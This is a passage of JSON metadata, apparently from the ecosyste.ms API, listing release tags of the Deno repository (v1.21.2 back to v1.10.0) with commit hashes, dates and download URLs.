o/tags/v1.21.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.2/manifests"},{"name":"v1.21.1","sha":"58bedd8d8422cf0ef6f9a581b188055a74cd9304","kind":"commit","published_at":"2022-04-28T20:33:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.1/manifests"},{"name":"v1.21.0","sha":"29c8cd8aae52b89075e6af84ddd34f813fa3ea8d","kind":"commit","published_at":"2022-04-21T01:50:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.21.0/manifests"},{"name":"v1.20.6","sha":"3ad1535e48505af3129c133408b496fa8eb7569c","kind":"commit","published_at":"2022-04-14T18:56:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.6/manifests"},{"name":"v1.20.5","sha":"d2c09408380191721ba7dfd971f802f5639eb1f7","kind":"commit","published_at":"2022-04-07T16:38:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.5/manifests"},{"name":"v1.20.4","sha":"a78f728a10bd2c0c3d61f91518dcb053ac53b13b","kind":"commit","published_at":"2022-03-31T17:09:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.4/manifests"},{"name":"v1.20.3","sha":"347da0d1174a685ad1a9445cc8c681677115731f","kind":"commit","published_at":"2022-03-25T15:22:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.3/manifests"},{"name":"v1.20.2","sha":"1be60627d857d788061204eaf7ed6667f7bf0eee","kind":"commit","published_at":"2022-03-24T02:39:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.2/manifests"},{"name":"v1.20.1","sha":"fce60f2cc20bda8403fc7577c086759744314561","kind":"commit","published_at":"2022-03-17T01:40:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.1/manifests"},{"name":"v1.20.0","sha":"418c1eb4b3d65a9573030a074170a344723608de","kind":"commit","published_at":"2022-03-16T20:07:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.20.0/manifests"},{"name":"v1.19.3","sha":"d6877e941cf270964015b86abae70b34febbef56","kind":"commit","published_at":"2022-03-10T11:22:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.3/manifests"},{"name":"v1.19.2","sha":"84f9a2550369e3f5132ab2ab9f274f76f7db3a90","kind":"commit","published_at":"2022-03-03T16:53:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.2/manifests"},{"name":"v1.19.1","sha":"8eb3f5f377fe278aec5039c259380f6ca8edadb8","kind":"commit","published_at":"2022-02-24T20:29:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.1/manifests"},{"name":"v1.19.0","sha":"551ace40cc513403a6a0cfd21304a2f9a1db7ece","kind":"commit","published_at":"2022-02-17T00:54:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.19.0/manifests"},{"name":"v1.18.2","sha":"ac4311880fd59383e1408647581cf996fb53fec9","kind":"commit","published_at":"2022-02-04T00:07:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.2/manifests"},{"name":"v1.18.1","sha":"0c931060784ee83082f7c221374aed451d4f1ad6","kind":"commit","published_at":"2022-01-27T16:33:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.1/manifests"},{"name":"v1.18.0","sha":"2ea535c8c1817a20a3915e350242423ee71cfa73","kind":"commit","published_at":"2022-01-20T16:19:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.18.0/manifests"},{"name":"v1.17.3","sha":"df5fe5a35f8ace40275a822927f3385c828beba7","kind":"commit","published_at":"2022-01-12T16:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.3/manifests"},{"name":"v1.17.2","sha":"ad4a07789441097ca477ebf796c31823b422db7a","kind":"commit","published_at":"2022-01-05T17:22:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.2/manifests"},{"name":"v1.17.1","sha":"ded77918fbd324c6d4038127bfce60380d56397d","kind":"commit","published_at":"2021-12-22T17:48:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.1/manifests"},{"name":"v1.17.0","sha":"5f11f87495effaf9b4ce6c8c615cdce3d50d91f8","kind":"commit","published_at":"2021-12-16T18:24:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.17.0/manifests"},{"name":"v1.16.4","sha":"ab286750a8c87215a9651efb11fcc620f2914005","kind":"commit","published_at":"2021-12-03T18:43:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.4/manifests"},{"name":"v1.16.3","sha":"bfa2f30529921155551e8b288bcda1e01c468b79","kind":"tag","published_at":"2021-11-24T23:06:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.3/manifests"},{"name":"v1.16.2","sha":"4836ab769c00c83b7c5488c4d9c5f185be858e70","kind":"commit","published_at":"2021-11-17T16:00:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.2/manifests"},{"name":"v1.16.1","sha":"fdf890a68d3d54d40c766fd78faeccb20bd2e2c6","kind":"commit","published_at":"2021-11-11T10:59:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.1/manifests"},{"name":"v1.16.0","sha":"1eae6c139ee1dac28df57d67d993792b773fa1ff","kind":"commit","published_at":"2021-11-09T12:55:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.16.0/manifests"},{"name":"v1.15.3","sha":"f32f458318819088d59f58b7a4c05f0d28e41dff","kind":"commit","published_at":"2021-10-25T11:11:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.3/manifests"},{"name":"v1.15.2","sha":"71da8140737a0ee81dd324e1156fd920a790c1cb","kind":"commit","published_at":"2021-10-18T19:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.2/manifests"},{"name":"v1.15.1","sha":"b1d63aefd9f150ed3acbc3d0a6c2f51dadad3d17","kind":"commit","published_at":"2021-10-13T07:48:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.1/manifests"},{"name":"v1.15.0","sha":"de3fa08d6cfac7edffb2411bbb42bb49af70dc82","kind":"commit","published_at":"2021-10-12T17:57:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.15.0/manifests"},{"name":"v1.14.3","sha":"1b7d6809f649318a0fb6f0e241c25885538bbe25","kind":"commit","published_at":"2021-10-04T22:03:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.3/manifests"},{"name":"v1.14.2","sha":"3ab682918a7cb9e23f8451eedb88074766d27049","kind":"commit","published_at":"2021-09-28T12:00:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.2/manifests"},{"name":"v1.14.1","sha":"f27902e749fb3a78ca35a0dc41c9fc53cd2806e1","kind":"commit","published_at":"2021-09-21T22:44:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.1/manifests"},{"name":"v1.14.0","sha":"f92cc66f0dbf8e9753f2e98d4469190f3b561eb0","kind":"commit","published_at":"2021-09-14T20:46:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.14.0/manifests"},{"name":"v1.13.2","sha":"7b882cc05f02e9b09e9ec2856e37730ae947f509","kind":"commit","published_at":"2021-08-23T20:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.2/manifests"},{"name":"v1.13.1","sha":"c67f6c13cd1de22e32f81723bc9224b8e2103a7a","kind":"commit","published_at":"2021-08-16T21:42:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.1/manifests"},{"name":"v1.13.0","sha":"d82351d67784a2bcb5431ebb233abc727f673152","kind":"commit","published_at":"2021-08-10T14:22:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.13.0/manifests"},{"name":"v1.12.2","sha":"dfba7a2b0197b05b3cb61724096111cc618aa747","kind":"commit","published_at":"2021-07-26T14:38:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"7d69f06db88cf022f2c5c6e0b04493af7b50a98b","kind":"commit","published_at":"2021-07-19T19:09:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"1ad6575028bd5a13eb0633cc5e7649e18deec556","kind":"commit","published_at":"2021-07-13T08:45:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.12.0/manifests"},{"name":"v1.11.5","sha":"1e57081906fd2c504c0e4895681bdc7386c1956f","kind":"commit","published_at":"2021-07-02T15:51:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.5/manifests"},{"name":"v1.11.4","sha":"ed16f4332263e81bf00a39ebc2200291b1fcbb8e","kind":"commit","published_at":"2021-07-01T11:57:51.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.4/manifests"},{"name":"v1.11.3","sha":"f4bed1081456089559c82441a13c4fb700840cac","kind":"commit","published_at":"2021-06-29T16:43:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.3/manifests"},{"name":"v1.11.2","sha":"2c0e482221cd86fdbdc055c76f1c214200419946","kind":"commit","published_at":"2021-06-21T15:47:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.2/manifests"},{"name":"v1.11.1","sha":"d7ce3adc8b97ebca61c1f527ea0f9b842d0a2dbe","kind":"commit","published_at":"2021-06-15T21:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.1/manifests"},{"name":"v1.11.0","sha":"b98293e21cb7e55def8fea2ca015381150d4cebf","kind":"commit","published_at":"2021-06-08T19:38:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.11.0/manifests"},{"name":"v1.10.3","sha":"1567c1013cc8ff12cf039137792da66a1d0015b5","kind":"tag","published_at":"2021-05-31T20:22:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"232ec7798c5ee38e645c2aea31aea3e9a81e17f3","kind":"commit","published_at":"2021-05-17T15:28:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"1cd1419e18386d512ab98849d132117182545b89","kind":"commit","published_at":"2021-05-12T03:11:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.10.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.10.1/manifests"},{"name":"v1.10.0","s